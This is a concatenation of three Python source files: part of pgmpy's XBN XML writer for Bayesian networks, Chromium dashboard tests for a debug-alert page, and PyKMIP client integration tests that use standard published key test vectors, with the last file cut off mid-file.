                elem.tail = i
            for elem in elem:
                self.indent(elem, level+1)
            # After the loop `elem` is the last child; its tail closes the
            # parent's indentation level.
            if not elem.tail or not elem.tail.strip():
                elem.tail = i
        else:
            # Leaf element: only fix up the tail.
            if level and (not elem.tail or not elem.tail.strip()):
                elem.tail = i

    def set_analysisnotebook(self, **data):
        """
        Set attributes for ANALYSISNOTEBOOK tag

        Parameters
        ----------
        **data: dict
            {name: value} for the attributes to be set.

        Examples
        --------
        >>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
        >>> writer = XBNWriter()
        >>> writer.set_analysisnotebook(NAME="Notebook.Cancer Example From Neapolitan",
        ...                             ROOT='Cancer')
        """
        for key, value in data.items():
            self.network.set(str(key), str(value))

    def set_bnmodel_name(self, name):
        """
        Set the name of the BNMODEL.

        Parameters
        ----------
        name: str
            Name of the BNModel.

        Examples
        --------
        >>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
        >>> writer = XBNWriter()
        >>> writer.set_bnmodel_name("Cancer")
        """
        self.bnmodel.set('NAME', str(name))

    def set_static_properties(self, **data):
        """
        Set STATICPROPERTIES tag for the network

        Parameters
        ----------
        **data: dict
            {name: value} for name and value of the property.

        Examples
        --------
        >>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
        >>> writer = XBNWriter()
        >>> writer.set_static_properties(FORMAT="MSR DTAS XML", VERSION="0.2", CREATOR="Microsoft Research DTAS")
        """
        static_prop = etree.SubElement(self.bnmodel, 'STATICPROPERTIES')
        # Each property becomes its own element with the value as attribute.
        for key, value in data.items():
            etree.SubElement(static_prop, key, attrib={'VALUE': value})

    def set_variables(self, data):
        """
        Set variables for the network.

        Parameters
        ----------
        data: dict
            dict for variable in the form of example as shown.

        Examples
        --------
        >>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
        >>> writer = XBNWriter()
        >>> writer.set_variables({'a': {'TYPE': 'discrete', 'XPOS': '13495',
        ...                             'YPOS': '10465', 'DESCRIPTION': '(a) Metastatic Cancer',
        ...                             'STATES': ['Present', 'Absent']},
        ...                       'b': {'TYPE': 'discrete', 'XPOS': '11290',
        ...                             'YPOS': '11965', 'DESCRIPTION': '(b) Serum Calcium Increase',
        ...                             'STATES': ['Present', 'Absent']}})
        """
        variables = etree.SubElement(self.bnmodel, "VARIABLES")
        # Sorted for a deterministic output order.
        for var in sorted(data):
            variable = etree.SubElement(variables, 'VAR', attrib={'NAME': var, 'TYPE': data[var]['TYPE'],
                                                                  'XPOS': data[var]['XPOS'], 'YPOS': data[var]['YPOS']})
            etree.SubElement(variable, 'DESCRIPTION', attrib={'DESCRIPTION': data[var]['DESCRIPTION']})
            for state in data[var]['STATES']:
                etree.SubElement(variable, 'STATENAME').text = state

    def set_edges(self, edge_list):
        """
        Set edges/arc in the network.

        Parameters
        ----------
        edge_list: array_like
            list, tuple, dict or set whose each elements has two values (parent, child).

        Examples
        --------
        >>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
        >>> writer = XBNWriter()
        >>> writer.set_edges([('a', 'b'), ('a', 'c'), ('b', 'd'), ('c', 'd'), ('c', 'e')])
        """
        structure = etree.SubElement(self.bnmodel, 'STRUCTURE')
        # One ARC element per directed edge.
        for edge in edge_list:
            etree.SubElement(structure, 'ARC', attrib={'PARENT': edge[0], 'CHILD': edge[1]})

    def set_distributions(self):
        """
        Set distributions in the network.

        Serializes every CPD of the model into a DIST element under
        DISTRIBUTIONS, sorted by variable name for deterministic output.

        Examples
        --------
        >>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
        >>> writer = XBNWriter()
        >>> writer.set_distributions()
        """
        distributions = etree.SubElement(self.bnmodel, 'DISTRIBUTIONS')
        cpds = self.model.get_cpds()
        cpds.sort(key=lambda x: x.variable)
        for cpd in cpds:
            # Flatten the CPD table; rows are written in ravel order.
            cpd_values = cpd.values.ravel()
            var = cpd.variable
            dist = etree.SubElement(distributions, 'DIST', attrib={'TYPE': self.model.node[var]['TYPE']})
            etree.SubElement(dist, 'PRIVATE', attrib={'NAME': var})
            dpis = etree.SubElement(dist, 'DPIS')
            # Evidence variables, reversed to match the reader's CONDSET order.
            evidence = cpd.variables[:0:-1]
            if evidence:
                condset = etree.SubElement(dist, 'CONDSET')
                for condelem in sorted(evidence):
                    etree.SubElement(condset, 'CONDELEM', attrib={'NAME': condelem})
                # TODO: Get Index value.
                # NOTE(review): emitting values two at a time assumes every
                # variable has exactly two states, and INDEXES is left blank
                # -- confirm before using with non-binary variables.
                for val in range(0, len(cpd_values), 2):
                    etree.SubElement(dpis, "DPI", attrib={'INDEXES': ' '}).text = \
                        " " + str(cpd_values[val]) + " " + str(cpd_values[val+1]) + " "
            else:
                # No parents: a single DPI row with the full marginal.
                etree.SubElement(dpis, "DPI").text = ' ' + ' '.join(map(str, cpd_values))
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import mock
import webapp2
import webtest
from dashboard import debug_alert
from dashboard import testing_common
from dashboard import utils
from dashboard.models import anomaly
from dashboard.models import anomaly_config
from dashboard.models import graph_data
# (revision, value) sample points used to populate test Row entities.
# Values step up from roughly 60 to roughly 70 at revision 310, giving the
# alert-simulation code a change to detect.
_SAMPLE_SERIES = [
    (300, 60.06), (301, 60.36), (302, 61.76), (303, 60.06), (304, 61.24),
    (305, 60.65), (306, 55.61), (307, 61.88), (308, 61.51), (309, 59.58),
    (310, 71.79), (311, 71.97), (312, 71.63), (313, 67.16), (314, 70.91),
    (315, 73.40), (316, 71.00), (317, 69.45), (318, 67.16), (319, 66.05),
]
class DebugAlertTest(testing_common.TestCase):
  """Tests for the /debug_alert page handler and its helper functions."""

  def setUp(self):
    super(DebugAlertTest, self).setUp()
    # Route the handler under test through a minimal WSGI app.
    app = webapp2.WSGIApplication(
        [('/debug_alert', debug_alert.DebugAlertHandler)])
    self.testapp = webtest.TestApp(app)

  def _AddSampleData(self):
    """Adds a Test and Row entities, and returns the Test key."""
    testing_common.AddTests(['M'], ['b'], {'suite': {'foo': {}}})
    test_path = 'M/b/suite/foo'
    rows_dict = {x: {'value': y} for x, y in _SAMPLE_SERIES}
    testing_common.AddRows(test_path, rows_dict)
    return utils.TestKey(test_path)

  def testGet_WithInvalidTestPath_ShowsFormAndError(self):
    response = self.testapp.get('/debug_alert?test_path=foo')
    self.assertIn('<form', response.body)
    self.assertIn('class="error"', response.body)

  def testGet_WithValidTestPath_ShowsChart(self):
    test_key = self._AddSampleData()
    test_path = utils.TestPath(test_key)
    response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
    self.assertIn('id="plot"', response.body)

  def testPost_SameAsGet(self):
    # Post is the same as get for this endpoint.
    test_key = self._AddSampleData()
    test_path = utils.TestPath(test_key)
    get_response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
    post_response = self.testapp.post('/debug_alert?test_path=%s' % test_path)
    self.assertEqual(get_response.body, post_response.body)

  def testGet_WithNoParameters_ShowsForm(self):
    response = self.testapp.get('/debug_alert')
    self.assertIn('<form', response.body)
    self.assertNotIn('id="plot"', response.body)

  def testGet_WithRevParameter_EmbedsCorrectRevisions(self):
    test_key = self._AddSampleData()
    test_path = utils.TestPath(test_key)
    response = self.testapp.get(
        '/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
        (test_path, 305, 10, 5))
    # Only 5 revisions exist before 305, so the window is 300..309.
    self.assertEqual(
        [300, 301, 302, 303, 304, 305, 306, 307, 308, 309],
        self.GetEmbeddedVariable(response, 'LOOKUP'))

  def testGet_InvalidNumBeforeParameter_ShowsFormAndError(self):
    test_key = self._AddSampleData()
    test_path = utils.TestPath(test_key)
    response = self.testapp.get(
        '/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
        (test_path, 305, 'foo', 5))
    self.assertIn('<form', response.body)
    self.assertIn('class="error"', response.body)
    self.assertNotIn('LOOKUP', response.body)

  def _AddAnomalyConfig(self, config_name, test_key, config_dict):
    """Adds a custom anomaly config which applies to one test."""
    anomaly_config_key = anomaly_config.AnomalyConfig(
        id=config_name,
        config=config_dict,
        patterns=[utils.TestPath(test_key)]).put()
    return anomaly_config_key

  @mock.patch.object(debug_alert, 'SimulateAlertProcessing')
  def testGet_TestHasOverriddenConfig_ConfigUsed(self, simulate_mock):
    test_key = self._AddSampleData()
    # Add a config which applies to the test. The test is updated upon put.
    self._AddAnomalyConfig('X', test_key, {'min_absolute_change': 10})
    test_key.get().put()
    response = self.testapp.get(
        '/debug_alert?test_path=%s' % utils.TestPath(test_key))
    # The custom config should be used when simulating alert processing.
    simulate_mock.assert_called_once_with(mock.ANY, min_absolute_change=10)
    # The config JSON should also be put into the form on the page.
    self.assertIn('"min_absolute_change": 10', response.body)

  @mock.patch.object(debug_alert, 'SimulateAlertProcessing')
  def testGet_WithValidCustomConfig_ConfigUsed(self, simulate_mock):
    test_key = self._AddSampleData()
    response = self.testapp.get(
        '/debug_alert?test_path=%s&config=%s' %
        (utils.TestPath(test_key),
         '{"min_relative_change":0.75}'))
    # The custom config should be used when simulating alert processing.
    simulate_mock.assert_called_once_with(mock.ANY, min_relative_change=0.75)
    # The config JSON should also be put into the form on the page.
    self.assertIn('"min_relative_change": 0.75', response.body)

  def testGet_WithInvalidCustomConfig_ErrorShown(self):
    test_key = self._AddSampleData()
    response = self.testapp.get(
        '/debug_alert?test_path=%s&config=%s' %
        (utils.TestPath(test_key), 'not valid json'))
    # The error message should be on the page; JS constants should not be.
    self.assertIn('Invalid JSON', response.body)
    self.assertNotIn('LOOKUP', response.body)

  def testGet_WithStoredAnomalies_ShowsStoredAnomalies(self):
    test_key = self._AddSampleData()
    anomaly.Anomaly(
        test=test_key, start_revision=309, end_revision=310,
        median_before_anomaly=60, median_after_anomaly=70,
        bug_id=12345).put()
    response = self.testapp.get(
        '/debug_alert?test_path=%s' % utils.TestPath(test_key))
    # Information about the stored anomaly should be somewhere on the page.
    self.assertIn('12345', response.body)

  def testFetchLatestRows(self):
    test_key = self._AddSampleData()
    rows = debug_alert._FetchLatestRows(test_key, 4)
    revisions = [r.revision for r in rows]
    self.assertEqual([316, 317, 318, 319], revisions)

  def testFetchAroundRev(self):
    test_key = self._AddSampleData()
    rows = debug_alert._FetchRowsAroundRev(test_key, 310, 5, 8)
    revisions = [r.revision for r in rows]
    # Expect 5 rows before 310, then 310 itself, then 7 after (inclusive
    # bounds as implemented by _FetchRowsAroundRev).
    self.assertEqual(
        [305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317],
        revisions)

  def testFetchRowsAroundRev_NotAllRowsAvailable(self):
    test_key = self._AddSampleData()
    rows = debug_alert._FetchRowsAroundRev(test_key, 310, 100, 100)
    # There are only 20 rows in the sample data, so only 20 can be fetched.
    self.assertEqual(20, len(rows))

  def testChartSeries(self):
    test_key = self._AddSampleData()
    rows = debug_alert._FetchRowsAroundRev(test_key, 310, 5, 5)
    # The indexes used in the chart series should match those in the lookup.
    self.assertEqual(
        [(0, 60.65), (1, 55.61), (2, 61.88), (3, 61.51), (4, 59.58),
         (5, 71.79), (6, 71.97), (7, 71.63), (8, 67.16), (9, 70.91)],
        debug_alert._ChartSeries(rows))

  def testRevisionList(self):
    test_key = self._AddSampleData()
    rows = debug_alert._FetchRowsAroundRev(test_key, 310, 5, 5)
    # The lookup dict maps indexes to x-values in the input series.
    self.assertEqual(
        [305, 306, 307, 308, 309, 310, 311, 312, 313, 314],
        debug_alert._RevisionList(rows))

  def testCsvUrl_RowsGiven_AllParamsSpecified(self):
    self._AddSampleData()
    rows = graph_data.Row.query().fetch(limit=20)
    self.assertEqual(
        '/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo&num_points=20&rev=319',
        debug_alert._CsvUrl('M/b/suite/foo', rows))

  def testCsvUrl_NoRows_OnlyTestPathSpecified(self):
    # If there are no rows available for some reason, a CSV download
    # URL can still be constructed, but without specific revisions.
    self.assertEqual(
        '/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo',
        debug_alert._CsvUrl('M/b/suite/foo', []))

  def testGraphUrl_RevisionGiven_RevisionParamInUrl(self):
    test_key = self._AddSampleData()
    # Both string and int can be accepted for revision.
    self.assertEqual(
        '/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
        debug_alert._GraphUrl(test_key.get(), 310))
    self.assertEqual(
        '/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
        debug_alert._GraphUrl(test_key.get(), '310'))

  def testGraphUrl_NoRevisionGiven_NoRevisionParamInUrl(self):
    test_key = self._AddSampleData()
    # Both None and empty string mean "no revision".
    self.assertEqual(
        '/report?masters=M&bots=b&tests=suite%2Ffoo',
        debug_alert._GraphUrl(test_key.get(), ''))
    self.assertEqual(
        '/report?masters=M&bots=b&tests=suite%2Ffoo',
        debug_alert._GraphUrl(test_key.get(), None))
# Allow running this test module directly (outside the test runner).
if __name__ == '__main__':
  unittest.main()
| |
# Copyright (c) 2015 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import testtools
import pytest
from kmip.core import enums
from kmip.pie import exceptions
from kmip.pie import factory
from kmip.pie import objects
@pytest.mark.usefixtures("simple")
class TestProxyKmipClientIntegration(testtools.TestCase):
    """Integration tests exercising create/register/get/destroy round trips
    through the ProxyKmipClient against a live KMIP server.

    NOTE(review): self.client is not set in setUp -- it is presumably
    attached by the 'simple' pytest fixture; verify against the fixture
    definition.
    """

    def setUp(self):
        super(TestProxyKmipClientIntegration, self).setUp()
        self.object_factory = factory.ObjectFactory()

    def tearDown(self):
        super(TestProxyKmipClientIntegration, self).tearDown()

    def test_symmetric_key_create_get_destroy(self):
        """
        Test that the ProxyKmipClient can create, retrieve, and destroy a
        symmetric key.
        """
        uid = self.client.create(enums.CryptographicAlgorithm.AES, 256)
        self.assertIsInstance(uid, six.string_types)
        try:
            key = self.client.get(uid)
            self.assertIsInstance(key, objects.SymmetricKey)
            self.assertEqual(
                key.cryptographic_algorithm,
                enums.CryptographicAlgorithm.AES)
            self.assertEqual(key.cryptographic_length, 256)
        finally:
            # Always clean up; afterwards both get and destroy must fail.
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)

    def test_symmetric_key_register_get_destroy(self):
        """
        Test that the ProxyKmipClient can register, retrieve, and destroy a
        symmetric key.
        """
        # Key encoding obtained from Section 14.2 of the KMIP 1.1 test
        # documentation.
        key = objects.SymmetricKey(
            enums.CryptographicAlgorithm.AES,
            128,
            (b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
             b'\x0F'))
        uid = self.client.register(key)
        self.assertIsInstance(uid, six.string_types)
        try:
            result = self.client.get(uid)
            self.assertIsInstance(result, objects.SymmetricKey)
            self.assertEqual(
                result, key, "expected {0}\nobserved {1}".format(result, key))
        finally:
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)

    def test_asymmetric_key_pair_create_get_destroy(self):
        """
        Test that the ProxyKmipClient can create, retrieve, and destroy an
        asymmetric key pair.
        """
        public_uid, private_uid = self.client.create_key_pair(
            enums.CryptographicAlgorithm.RSA, 2048)
        self.assertIsInstance(public_uid, six.string_types)
        self.assertIsInstance(private_uid, six.string_types)
        try:
            public_key = self.client.get(public_uid)
            self.assertIsInstance(public_key, objects.PublicKey)
            self.assertEqual(
                public_key.cryptographic_algorithm,
                enums.CryptographicAlgorithm.RSA)
            self.assertEqual(public_key.cryptographic_length, 2048)
            private_key = self.client.get(private_uid)
            self.assertIsInstance(private_key, objects.PrivateKey)
            self.assertEqual(
                private_key.cryptographic_algorithm,
                enums.CryptographicAlgorithm.RSA)
            self.assertEqual(private_key.cryptographic_length, 2048)
        finally:
            # Both halves of the pair must be destroyed independently.
            self.client.destroy(public_uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, public_uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy,
                public_uid)
            self.client.destroy(private_uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, private_uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy,
                private_uid)

    def test_public_key_register_get_destroy(self):
        """
        Test that the ProxyKmipClient can register, retrieve, and destroy a
        public key.
        """
        # Key encoding obtained from Section 13.4 of the KMIP 1.1 test
        # documentation.
        key = objects.PublicKey(
            enums.CryptographicAlgorithm.RSA,
            2048,
            (b'\x30\x82\x01\x0A\x02\x82\x01\x01\x00\xAB\x7F\x16\x1C\x00\x42'
             b'\x49\x6C\xCD\x6C\x6D\x4D\xAD\xB9\x19\x97\x34\x35\x35\x77\x76'
             b'\x00\x3A\xCF\x54\xB7\xAF\x1E\x44\x0A\xFB\x80\xB6\x4A\x87\x55'
             b'\xF8\x00\x2C\xFE\xBA\x6B\x18\x45\x40\xA2\xD6\x60\x86\xD7\x46'
             b'\x48\x34\x6D\x75\xB8\xD7\x18\x12\xB2\x05\x38\x7C\x0F\x65\x83'
             b'\xBC\x4D\x7D\xC7\xEC\x11\x4F\x3B\x17\x6B\x79\x57\xC4\x22\xE7'
             b'\xD0\x3F\xC6\x26\x7F\xA2\xA6\xF8\x9B\x9B\xEE\x9E\x60\xA1\xD7'
             b'\xC2\xD8\x33\xE5\xA5\xF4\xBB\x0B\x14\x34\xF4\xE7\x95\xA4\x11'
             b'\x00\xF8\xAA\x21\x49\x00\xDF\x8B\x65\x08\x9F\x98\x13\x5B\x1C'
             b'\x67\xB7\x01\x67\x5A\xBD\xBC\x7D\x57\x21\xAA\xC9\xD1\x4A\x7F'
             b'\x08\x1F\xCE\xC8\x0B\x64\xE8\xA0\xEC\xC8\x29\x53\x53\xC7\x95'
             b'\x32\x8A\xBF\x70\xE1\xB4\x2E\x7B\xB8\xB7\xF4\xE8\xAC\x8C\x81'
             b'\x0C\xDB\x66\xE3\xD2\x11\x26\xEB\xA8\xDA\x7D\x0C\xA3\x41\x42'
             b'\xCB\x76\xF9\x1F\x01\x3D\xA8\x09\xE9\xC1\xB7\xAE\x64\xC5\x41'
             b'\x30\xFB\xC2\x1D\x80\xE9\xC2\xCB\x06\xC5\xC8\xD7\xCC\xE8\x94'
             b'\x6A\x9A\xC9\x9B\x1C\x28\x15\xC3\x61\x2A\x29\xA8\x2D\x73\xA1'
             b'\xF9\x93\x74\xFE\x30\xE5\x49\x51\x66\x2A\x6E\xDA\x29\xC6\xFC'
             b'\x41\x13\x35\xD5\xDC\x74\x26\xB0\xF6\x05\x02\x03\x01\x00\x01'),
            enums.KeyFormatType.PKCS_1)
        uid = self.client.register(key)
        self.assertIsInstance(uid, six.string_types)
        try:
            result = self.client.get(uid)
            self.assertIsInstance(result, objects.PublicKey)
            self.assertEqual(
                result, key, "expected {0}\nobserved {1}".format(result, key))
        finally:
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)

    def test_private_key_register_get_destroy(self):
        """
        Test that the ProxyKmipClient can register, retrieve, and destroy a
        private key.
        """
        # Key encoding obtained from Section 13.4 of the KMIP 1.1 test
        # documentation.
        key = objects.PrivateKey(
            enums.CryptographicAlgorithm.RSA,
            2048,
            (b'\x30\x82\x04\xA5\x02\x01\x00\x02\x82\x01\x01\x00\xAB\x7F\x16'
             b'\x1C\x00\x42\x49\x6C\xCD\x6C\x6D\x4D\xAD\xB9\x19\x97\x34\x35'
             b'\x35\x77\x76\x00\x3A\xCF\x54\xB7\xAF\x1E\x44\x0A\xFB\x80\xB6'
             b'\x4A\x87\x55\xF8\x00\x2C\xFE\xBA\x6B\x18\x45\x40\xA2\xD6\x60'
             b'\x86\xD7\x46\x48\x34\x6D\x75\xB8\xD7\x18\x12\xB2\x05\x38\x7C'
             b'\x0F\x65\x83\xBC\x4D\x7D\xC7\xEC\x11\x4F\x3B\x17\x6B\x79\x57'
             b'\xC4\x22\xE7\xD0\x3F\xC6\x26\x7F\xA2\xA6\xF8\x9B\x9B\xEE\x9E'
             b'\x60\xA1\xD7\xC2\xD8\x33\xE5\xA5\xF4\xBB\x0B\x14\x34\xF4\xE7'
             b'\x95\xA4\x11\x00\xF8\xAA\x21\x49\x00\xDF\x8B\x65\x08\x9F\x98'
             b'\x13\x5B\x1C\x67\xB7\x01\x67\x5A\xBD\xBC\x7D\x57\x21\xAA\xC9'
             b'\xD1\x4A\x7F\x08\x1F\xCE\xC8\x0B\x64\xE8\xA0\xEC\xC8\x29\x53'
             b'\x53\xC7\x95\x32\x8A\xBF\x70\xE1\xB4\x2E\x7B\xB8\xB7\xF4\xE8'
             b'\xAC\x8C\x81\x0C\xDB\x66\xE3\xD2\x11\x26\xEB\xA8\xDA\x7D\x0C'
             b'\xA3\x41\x42\xCB\x76\xF9\x1F\x01\x3D\xA8\x09\xE9\xC1\xB7\xAE'
             b'\x64\xC5\x41\x30\xFB\xC2\x1D\x80\xE9\xC2\xCB\x06\xC5\xC8\xD7'
             b'\xCC\xE8\x94\x6A\x9A\xC9\x9B\x1C\x28\x15\xC3\x61\x2A\x29\xA8'
             b'\x2D\x73\xA1\xF9\x93\x74\xFE\x30\xE5\x49\x51\x66\x2A\x6E\xDA'
             b'\x29\xC6\xFC\x41\x13\x35\xD5\xDC\x74\x26\xB0\xF6\x05\x02\x03'
             b'\x01\x00\x01\x02\x82\x01\x00\x3B\x12\x45\x5D\x53\xC1\x81\x65'
             b'\x16\xC5\x18\x49\x3F\x63\x98\xAA\xFA\x72\xB1\x7D\xFA\x89\x4D'
             b'\xB8\x88\xA7\xD4\x8C\x0A\x47\xF6\x25\x79\xA4\xE6\x44\xF8\x6D'
             b'\xA7\x11\xFE\xC8\x50\xCD\xD9\xDB\xBD\x17\xF6\x9A\x44\x3D\x2E'
             b'\xC1\xDD\x60\xD3\xC6\x18\xFA\x74\xCD\xE5\xFD\xAF\xAB\xD6\xBA'
             b'\xA2\x6E\xB0\xA3\xAD\xB4\xDE\xF6\x48\x0F\xB1\x21\x8C\xD3\xB0'
             b'\x83\xE2\x52\xE8\x85\xB6\xF0\x72\x9F\x98\xB2\x14\x4D\x2B\x72'
             b'\x29\x3E\x1B\x11\xD7\x33\x93\xBC\x41\xF7\x5B\x15\xEE\x3D\x75'
             b'\x69\xB4\x99\x5E\xD1\xA1\x44\x25\xDA\x43\x19\xB7\xB2\x6B\x0E'
             b'\x8F\xEF\x17\xC3\x75\x42\xAE\x5C\x6D\x58\x49\xF8\x72\x09\x56'
             b'\x7F\x39\x25\xA4\x7B\x01\x6D\x56\x48\x59\x71\x7B\xC5\x7F\xCB'
             b'\x45\x22\xD0\xAA\x49\xCE\x81\x6E\x5B\xE7\xB3\x08\x81\x93\x23'
             b'\x6E\xC9\xEF\xFF\x14\x08\x58\x04\x5B\x73\xC5\xD7\x9B\xAF\x38'
             b'\xF7\xC6\x7F\x04\xC5\xDC\xF0\xE3\x80\x6A\xD9\x82\xD1\x25\x90'
             b'\x58\xC3\x47\x3E\x84\x71\x79\xA8\x78\xF2\xC6\xB3\xBD\x96\x8F'
             b'\xB9\x9E\xA4\x6E\x91\x85\x89\x2F\x36\x76\xE7\x89\x65\xC2\xAE'
             b'\xD4\x87\x7B\xA3\x91\x7D\xF0\x7C\x5E\x92\x74\x74\xF1\x9E\x76'
             b'\x4B\xA6\x1D\xC3\x8D\x63\xBF\x29\x02\x81\x81\x00\xD5\xC6\x9C'
             b'\x8C\x3C\xDC\x24\x64\x74\x4A\x79\x37\x13\xDA\xFB\x9F\x1D\xBC'
             b'\x79\x9F\xF9\x64\x23\xFE\xCD\x3C\xBA\x79\x42\x86\xBC\xE9\x20'
             b'\xF4\xB5\xC1\x83\xF9\x9E\xE9\x02\x8D\xB6\x21\x2C\x62\x77\xC4'
             b'\xC8\x29\x7F\xCF\xBC\xE7\xF7\xC2\x4C\xA4\xC5\x1F\xC7\x18\x2F'
             b'\xB8\xF4\x01\x9F\xB1\xD5\x65\x96\x74\xC5\xCB\xE6\xD5\xFA\x99'
             b'\x20\x51\x34\x17\x60\xCD\x00\x73\x57\x29\xA0\x70\xA9\xE5\x4D'
             b'\x34\x2B\xEB\xA8\xEF\x47\xEE\x82\xD3\xA0\x1B\x04\xCE\xC4\xA0'
             b'\x0D\x4D\xDB\x41\xE3\x51\x16\xFC\x22\x1E\x85\x4B\x43\xA6\x96'
             b'\xC0\xE6\x41\x9B\x1B\x02\x81\x81\x00\xCD\x5E\xA7\x70\x27\x89'
             b'\x06\x4B\x67\x35\x40\xCB\xFF\x09\x35\x6A\xD8\x0B\xC3\xD5\x92'
             b'\x81\x2E\xBA\x47\x61\x0B\x9F\xAC\x6A\xEC\xEF\xE2\x2A\xCA\xE4'
             b'\x38\x45\x9C\xDA\x74\xE5\x96\x53\xD8\x8C\x04\x18\x9D\x34\x39'
             b'\x9B\xF5\xB1\x4B\x92\x0E\x34\xEF\x38\xA7\xD0\x9F\xE6\x95\x93'
             b'\x39\x6E\x8F\xE7\x35\xE6\xF0\xA6\xAE\x49\x90\x40\x10\x41\xD8'
             b'\xA4\x06\xB6\xFD\x86\xA1\x16\x1E\x45\xF9\x5A\x3E\xAA\x5C\x10'
             b'\x12\xE6\x66\x2E\x44\xF1\x5F\x33\x5A\xC9\x71\xE1\x76\x6B\x2B'
             b'\xB9\xC9\x85\x10\x99\x74\x14\x1B\x44\xD3\x7E\x1E\x31\x98\x20'
             b'\xA5\x5F\x02\x81\x81\x00\xB2\x87\x12\x37\xBF\x9F\xAD\x38\xC3'
             b'\x31\x6A\xB7\x87\x7A\x6A\x86\x80\x63\xE5\x42\xA7\x18\x6D\x43'
             b'\x1E\x8D\x27\xC1\x9A\xC0\x41\x45\x84\x03\x39\x42\xE9\xFF\x6E'
             b'\x29\x73\xBB\x7B\x2D\x8B\x0E\x94\xAD\x1E\xE8\x21\x58\x10\x8F'
             b'\xBC\x86\x64\x51\x7A\x5A\x46\x7F\xB9\x63\x01\x4B\xD5\xDC\xC2'
             b'\xB4\xFB\x08\x7C\x23\x03\x9D\x11\x92\x0D\xBE\x22\xFD\x9F\x16'
             b'\xB4\xD8\x9E\x23\x22\x5C\xD4\x55\xAD\xBA\xF3\x2E\xF4\x3F\x18'
             b'\x58\x64\xA3\x6D\x63\x03\x09\xD6\x85\x3F\x77\x14\xB3\x9A\xAE'
             b'\x1E\xBE\xE3\x93\x8F\x87\xC2\x70\x7E\x17\x8C\x73\x9F\x9F\x02'
             b'\x81\x81\x00\x96\x90\xBE\xD1\x4B\x2A\xFA\xA2\x6D\x98\x6D\x59'
             b'\x22\x31\xEE\x27\xD7\x1D\x49\x06\x5B\xD2\xBA\x1F\x78\x15\x7E'
             b'\x20\x22\x98\x81\xFD\x9D\x23\x22\x7D\x0F\x84\x79\xEA\xEF\xA9'
             b'\x22\xFD\x75\xD5\xB1\x6B\x1A\x56\x1F\xA6\x68\x0B\x04\x0C\xA0'
             b'\xBD\xCE\x65\x0B\x23\xB9\x17\xA4\xB1\xBB\x79\x83\xA7\x4F\xAD'
             b'\x70\xE1\xC3\x05\xCB\xEC\x2B\xFF\x1A\x85\xA7\x26\xA1\xD9\x02'
             b'\x60\xE4\xF1\x08\x4F\x51\x82\x34\xDC\xD3\xFE\x77\x0B\x95\x20'
             b'\x21\x5B\xD5\x43\xBB\x6A\x41\x17\x71\x87\x54\x67\x6A\x34\x17'
             b'\x16\x66\xA7\x9F\x26\xE7\x9C\x14\x9C\x5A\xA1\x02\x81\x81\x00'
             b'\xA0\xC9\x85\xA0\xA0\xA7\x91\xA6\x59\xF9\x97\x31\x13\x4C\x44'
             b'\xF3\x7B\x2E\x52\x0A\x2C\xEA\x35\x80\x0A\xD2\x72\x41\xED\x36'
             b'\x0D\xFD\xE6\xE8\xCA\x61\x4F\x12\x04\x7F\xD0\x8B\x76\xAC\x4D'
             b'\x13\xC0\x56\xA0\x69\x9E\x2F\x98\xA1\xCA\xC9\x10\x11\x29\x4D'
             b'\x71\x20\x8F\x4A\xBA\xB3\x3B\xA8\x7A\xA0\x51\x7F\x41\x5B\xAC'
             b'\xA8\x8D\x6B\xAC\x00\x60\x88\xFA\x60\x1D\x34\x94\x17\xE1\xF0'
             b'\xC9\xB2\x3A\xFF\xA4\xD4\x96\x61\x8D\xBC\x02\x49\x86\xED\x69'
             b'\x0B\xBB\x7B\x02\x57\x68\xFF\x9D\xF8\xAC\x15\x41\x6F\x48\x9F'
             b'\x81\x29\xC3\x23\x41\xA8\xB4\x4F'),
            enums.KeyFormatType.PKCS_8)
        uid = self.client.register(key)
        self.assertIsInstance(uid, six.string_types)
        try:
            result = self.client.get(uid)
            self.assertIsInstance(result, objects.PrivateKey)
            self.assertEqual(
                result, key, "expected {0}\nobserved {1}".format(result, key))
        finally:
            self.client.destroy(uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.get, uid)
            self.assertRaises(
                exceptions.KmipOperationFailure, self.client.destroy, uid)

    def test_x509_certificate_register_get_destroy(self):
        """
        Test that the ProxyKmipClient can register, retrieve, and destroy an
        X.509 certificate.
        """
